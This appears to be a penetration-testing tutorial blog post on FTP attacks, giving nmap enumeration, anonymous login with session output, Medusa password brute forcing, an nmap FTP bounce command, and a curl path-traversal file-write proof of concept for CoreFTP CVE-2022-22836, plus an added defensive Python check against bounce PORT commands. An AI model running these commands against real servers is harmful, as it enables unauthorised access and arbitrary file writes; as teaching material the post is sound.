FTP Exploitation

By Sh1dO0w November 12, 2025 Posted in Network

FTP

The File Transfer Protocol (FTP) is a standard network protocol used to transfer files between computers. It also performs directory and file operations, such as changing the working directory, listing files, and renaming and deleting directories or files. By default, FTP listens on port TCP/21.

Enumeration

We can use Nmap with its default scripts (-sC) and service version detection (-sV):

nmap -sC -sV 

ATTACKS

1. Anonymous Authentication

With anonymous authentication, we can log in to FTP without a password.

ftp 192.168.2.142
anonymous
ftp 192.168.2.142

Connected to 192.168.2.142.
220 (vsFTPd 2.3.4)
Name (192.168.2.142:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.

2. Brute Forcing

If the first method fails, I will use Medusa for this.

medusa -U /Path/to/Wordlist -P /usr/share/wordlists/rockyou.txt -h 10.129.203.7 -M ftp

3. FTP Bounce Attack

An FTP bounce attack is a network attack that uses FTP servers to deliver outbound traffic to another device on the network. The attacker uses a PORT command to trick the FTP connection into running commands and getting information from a device other than the intended server.

Nmap's -b option is used for the bounce attack:

nmap -Pn -v -n -p80 -b anonymous:[email protected] 172.17.0.2
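
The bounce only works when the server honors a PORT argument that names a host other than the client. The following is an added example, not code from the original post: a server-side check in the spirit of RFC 2577 that parses the PORT argument and refuses it when the data address differs from the control-connection peer or the port is below 1024. The function names and sample lines are constructed for illustration.

```python
import ipaddress
import re

# PORT h1,h2,h3,h4,p1,p2 (RFC 959): four address octets, two port octets.
PORT_RE = re.compile(r"^PORT\s+(\d{1,3}(?:,\d{1,3}){5})\s*$", re.IGNORECASE)


def parse_port(line):
    """Return (ip, port) from a PORT command line, or None if malformed."""
    m = PORT_RE.match(line.strip())
    if not m:
        return None
    nums = [int(n) for n in m.group(1).split(",")]
    if any(n > 255 for n in nums):
        return None
    ip = ipaddress.IPv4Address(".".join(map(str, nums[:4])))
    return ip, nums[4] * 256 + nums[5]


def check_port(control_peer, line):
    """Decide whether a server should honor a PORT command.

    control_peer is the source address of the client's control connection.
    Returns (allowed, reason).
    """
    parsed = parse_port(line)
    if parsed is None:
        return False, "malformed PORT argument"
    ip, port = parsed
    if ip != ipaddress.IPv4Address(control_peer):
        return False, f"bounce: data address {ip} is not the client {control_peer}"
    if port < 1024:
        return False, f"privileged data port {port}"
    return True, "ok"


# Constructed control-channel lines: (client address, command sent).
SAMPLES = [
    ("192.168.2.50", "PORT 192,168,2,50,195,80"),  # own address, port 50000
    ("192.168.2.50", "PORT 172,17,0,2,0,80"),      # third host, port 80
    ("192.168.2.50", "PORT 192,168,2,50,0,22"),    # own address, privileged port
    ("192.168.2.50", "PORT 192,168,2,300,1,1"),    # octet out of range
]

if __name__ == "__main__":
    for peer, cmd in SAMPLES:
        print(peer, cmd, "->", check_port(peer, cmd))
```

Rejected commands of the first kind are also worth logging, since a PORT naming a third host is the signature of the scan shown above.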

Latest FTP Vulnerabilities

CoreFTP before build 727 has a vulnerability assigned CVE-2022-22836. The affected FTP service does not correctly process HTTP PUT requests, which leads to an authenticated directory/path traversal and arbitrary file write. This vulnerability allows us to write files outside the directory to which the service has access.

This FTP service uses an HTTP POST request to upload files. However, the CoreFTP service allows an HTTP PUT request, which we can use to write content to files.

curl -k -X PUT -H "Host: " --basic -u : --data-binary "PoC." --path-as-is https:///../../../../../../whoops

With this command we create a raw HTTP PUT request (-X PUT) with basic auth (--basic -u :), the path for the file (--path-as-is https:///../../../../../whoops), and its content (--data-binary "PoC."). Additionally, we specify the Host header (-H "Host: ") with the IP address of our target system.

